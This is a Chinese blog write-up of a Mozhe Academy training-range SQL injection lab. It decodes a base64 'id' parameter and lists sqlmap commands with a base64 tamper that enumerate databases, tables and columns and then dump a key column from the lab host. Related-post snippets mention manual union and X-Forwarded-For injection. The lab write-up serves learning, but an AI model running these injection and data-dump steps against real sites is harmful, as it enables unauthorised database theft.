墨者学院 --SQL注入实战-MySQL

最新推荐文章于 2025-10-17 23:52:11 发布

原创最新推荐文章于 2025-10-17 23:52:11 发布 · 601 阅读

4 ·

CC 4.0 BY-SA版权

文章标签：

#安全 #sql

本文介绍了如何通过粗略判断和Kali虚拟机，利用sqlmap工具对一个网站进行精确的SQL注入检测，包括解密参数、识别漏洞、探索数据库结构并获取敏感信息的过程。

一、粗略判断是否存在sql注入

1.访问链接：http://219.153.49.228:40602/

id=MQo= ------->有可能存在sql注入，并且看到id后面的参数可能是base64加密后的结果，我们尝试解密，解密结果为1

二、kali虚拟机精确判断

需注意（网站id采用的是base64加密的结果故用sqlmap注入时也必须先用base64加密）

1.判断网站是否存在sql注入漏洞（设置level=4）

sqlmap -u http://219.153.49.228:42233/show.php?id=MQo= --tamper=base64encode --level=4

2.查看该网站下的数据库

sqlmap -u http://219.153.49.228:42233/show.php?id=MQo= --tamper=base64encode --level=4 --dbs

3.查看该网站当前使用的数据库

sqlmap -u http://219.153.49.228:42233/show.php?id=MQo= --tamper=base64encode --level=4 --current-db

4.查看当前使用数据库下面的表

sqlmap -u http://219.153.49.228:42233/show.php?id=MQo= --tamper=base64encode --level=4 -D test --tables

5.查看敏感表中的列名

sqlmap -u http://219.153.49.228:42233/show.php?id=MQo= --tamper=base64encode --level=4 -D test -T data --columns

6.爆破敏感列名下的元素

sqlmap -u http://219.153.49.228:42233/show.php?id=MQo= --tamper=base64encode --level=4 -D test -T data -C thekey --dump

得到key，SQL注入成功！

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

weixin_45914445

关注关注

2
点赞
踩
4

收藏

觉得还不错? 一键收藏
1
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

墨者学院之SQL注入实战--MySQL

Chris_HackFromCN的博客

08-10

1060

目录手工注入工具注入（中转型）欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题，有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能，丰富你的文章UML 图表FLowchart流程图导出与导入导出导入手工注入辅助工具：小葵多功能转换工具作用：编码解码、加密解密 1.首先，启动靶场环境，根据URL显示，可知目标

墨者学院-SQL注入漏洞测试（报错盲注）

weixin_42939822的博客

03-30

5375

墨者学院-SQL注入漏洞测试（报错盲注）

1 条评论您还未登录，请先登录后发表或查看评论

墨者SQL注入实战-MySQL

wswr的博客

03-14

1991

思路：实话实话，我前面学的能试的都试了，比方单引号，sleep（）， and 1=1，宽字节，http注入，甚至对这个请求包进行了各种蹂虐，发现真的只要没有MQo这仨是一定不回显别的，所以我想，这应该不仅仅只是过滤了字符，那要从哪方面再来思考呢，还记得前面学了编码绕过吗，后端了做了字符的过滤，我们用编码绕过，有没有一种可能现在是后端做了编码的限制呢，这个时候我们就可以再考，为什么是id=MQo才能回显，就是说MQo的编码方式是正确，那百度一搜就会发现，MQo对应的base64编码是1，好的，那就破案了，这题

SQL注入攻击与防御详解（2024实战版）

最新发布

fearhacker的专栏

10-17

1192

摘要：SQL注入是Web安全中常见的高危漏洞，通过篡改用户输入执行恶意SQL语句，可窃取数据或控制服务器。本文系统讲解了SQL注入的原理、分类（布尔盲注、时间盲注等）、检测方法（手工测试与sqlmap工具使用）以及防御策略（参数化查询、输入验证等）。结合DVWA靶场实例演示了攻击流程，并强调了法律合规性。本文仅供学习研究，所有测试必须获得授权。

SQL注入实战-MySQL

weixin_47493074的博客

10-06

1021

SQL注入实战-MySQL

墨者学院 SQL注入实战-MySQL

qq_38807738的博客

12-13

886

打开题目，发现url的id参数有一串base64，MQo=解码，得到1 ok，看来提交的参数都是需要经过base64转码的才行根据题目，直接开始猜字段 id=1 order by 2正确，order by 3错误，判断有两个字段使用联合注入 id=-1 union select 1,2 在1,2位置都有回显，id=-1 union select database(),2 判断数据库...

SQL注入实战

11-20

安全大神冰河亲自制作SQL注入入门级案例，非常适合初学者研究实践SQL注入，更好的提升自身对SQL 漏洞的注入能力和对数据库安全的认识。

墨者学院 X-Forwarded-For注入漏洞实战

crasher123的博客

06-19

2219

SQLMap是一个基于Python编写的工具，因此需要安装Python。可以从Python官方网站下载Python安装包，也可以使用包管理器进行安装。如果Python已经安装，则会显示Python的版本号。请求信息中多加一条X-Forwarded-For:*得到库表名user和login，继续攻击user表。运行后会显示SQLMap的欢迎信息和命令行帮助。得到数据库名称为webcalender，进行扫描。安装burpsuite和sqlmap。2.安装Python。4.运行SQLMap。

墨者学院 SQL手工注入漏洞测试(MySQL数据库)

qq_48368964的博客

07-22

572

id=1 order by 5 回显异常，说明有四列字段。id=1 order by 1 回显正常。由于为root用户，所以可以高权限访问其他的数据库信息，可跨库查询信息，同一个服务器下的不同站点中的数据库均可查看。接下来进行信息收集，收集数据库的信息：操作系统，数据库名，数据库的用户，数据库的版本等。直接在可控变量后面随便输入值，看回显效果，回显不正常，可能存在SQL注入。观察url信息，为GET请求，存在可控变量，验证是否存在SQL注入。1 and 1=2 回显不正常，可能存在SQL注入。

墨者学院09 X-Forwarded-For注入漏洞实战

weixin_42789937的博客

02-10

751

墨者学院09 X-Forwarded-For注入漏洞实战，参考大佬wp，对于显错注入整理了手工和sqlmap两种注入流程~

SQL注入实战---利用“dbo”获得SQL管理权限和系统权限

Akuma专栏

04-07

1133

刚刚开始学习SQL注入入侵，有写的不对和不好的地方希望各位师哥，师姐们多多指导。在一个供求信息发布的网站上测试了一下，页面Http://www.xxx.com/new/new.asp?id=49我做了如下测试：(1) Http://www.xxx.com/new/new.asp?id=49Microsoft OLE DB Provider for ODBC Drivers 错误 8

sql注入教程.sql注入实战

11-09

sql注入详细教程寻找存在sql注入的网址探测过滤 tamper 得到shell

墨者mysql注入_SQL注入实战-MySQL-墨者学院

weixin_29311017的博客

01-19

311

SQL注入实战-MySQL今天我将用两种方法来讲解，第一种，SQLMap自动化跑数据库，第二种，利用火狐的hackbar来手工注入。【第一种】1.先看这个url：http://219.153.49.228:45709/show.php?id=MQo=，一般来说都是id=一个数字，这个MQo=是属于base64加密，加密规律、规则请参考百度百科。2.用SQLMap的tamper插件，语句：sqlma...

SQL注入实战MySQL_SQL注入实战-MySQL

weixin_35070578的博客

02-11

376

靶场地址：https://mozhe.cn/bug/detail/MFZ4VjBxRnlIMHBUdGllRDJBMWtRZz09bW96aGUmozhe进入靶场详情页，点击启动靶场，根据系统提供的信息进入靶场环境。Php注入mysql查询语句，由地址中的“?id=MQo=”可以看出，此处传递时用了base64编码，base64解码“id=MQo=”为1，常用mysql注入语句：这里仅列出常用的信...

墨者 - SQL注入实战-MySQL

吃肉唐僧的博客

07-10

947

按照题目提示，拿MQo=去base64解码，发现是1 tamper是使用SQLMap提供的tamper脚本，可在一定程度上避开应用程序的敏感字符过滤、绕过WAF规则的阻挡，继而进行渗透攻击。这里只要用tamper转base64encode 解码，其他和正常的sqlmap用法没区别爆库，sqlmap -u http://219.153.49.228:44096/...

sql 注入实战

终日而思不如须臾所学。

11-30

2160

直接开整 // 后端接口 // get my all todos router.post("/api/todo/list", (req, res) => { let { _openid = 'kong', } = { ...req.body } console.log(_openid) const sql = ` select * from todo_today where _openid = '${_openid}' ` sqlQuery(sql,

墨者学院sql注入 x-f

07-27

墨者学院SQL注入是一种常见的Web应用程序安全漏洞，攻击者通过在输入字段中插入恶意的SQL代码来实现对数据库的非授权访问。X-F是HTTP请求头部的一个字段，通常用于传递客户端IP地址或其他相关信息。在某些情况下，...